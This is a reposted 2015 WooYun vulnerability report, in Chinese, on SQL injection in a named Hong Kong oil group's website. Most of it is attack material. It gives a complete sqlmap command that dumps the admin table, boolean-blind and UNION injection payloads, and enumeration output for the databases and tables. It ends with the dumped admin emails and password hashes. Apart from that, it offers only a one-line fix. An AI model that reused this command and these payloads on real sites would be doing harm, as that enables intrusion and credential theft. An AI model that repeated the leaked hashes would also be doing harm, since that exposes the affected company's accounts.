记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

香港百田石油国际集团某处存在SQL注入漏洞(可获得登陆密码)

2015-11-30 04:25

使用sqlmap进行测试;



测试地址:http://**.**.**.**/tips_about.php?news_id=126&pageid=1&Language=traditional



code 区域
python sqlmap.py -u "http://**.**.**.**/tips_about.php?news_id=126&pageid=1&Language=traditional" -p news_id --technique=BU --random-agent -D ppig -T admin -C email,id,name,password --dump

漏洞证明:

code 区域
---

Parameter: news_id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: news_id=126 AND 9637=9637&pageid=1&Language=traditional



Type: UNION query

Title: MySQL UNION query (70) - 22 columns

Payload: news_id=-5621 UNION ALL SELECT 70,70,70,CONCAT(0x71786a7a71,0x6c6a49746c44596a655a,0x716b627171),70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70#&pageid=1&Language=traditional

---

web server operating system: Windows 2008 R2 or 7

web application technology: Microsoft IIS 7.5

back-end DBMS: MySQL >= 5.0.0

current user: 'ppig@**.**.**.**'

current user is DBA: False





code 区域
available databases [2]:

[*] information_schema

[*] ppig





code 区域
Database: ppig

[29 tables]

+---------------+

| user |

| work |

| address |

| admin |

| applications |

| books |

| books_res |

| cat |

| category |

| connect_us |

| counts |

| ext_info |

| gallery |

| gallery_photo |

| jsfw_cat |

| jsfw_news |

| lang |

| member |

| message |

| news |

| product |

| table_down |

| tips |

| tzz_cat |

| unit |

| video |

| xgmy_cat |

| xgmy_news |

| years |

+---------------+





code 区域
Database: ppig

Table: admin

[5 columns]

+------------+-------------+

| Column | Type |

+------------+-------------+

| address_id | numeric |

| email | non-numeric |

| id | numeric |

| name | non-numeric |

| password | non-numeric |

+------------+-------------+





code 区域
Database: ppig

Table: admin

[2 entries]

+-----------------+----+--------+----------------------------------+

| email | id | name | password |

+-----------------+----+--------+----------------------------------+

| admin@localhost | 41 | admin | 759613b741648bd91c42268306c7e140 |

| admin | 52 | hklist | a83f0eb30289b6b99329c1610226b6dd |

+-----------------+----+--------+----------------------------------+

修复方案:

增加过滤。

知识来源: www.wooyun.org/bugs/wooyun-2015-0146083

阅读:108048 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“香港百田石油国际集团某处存在SQL注入漏洞(可获得登陆密码)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云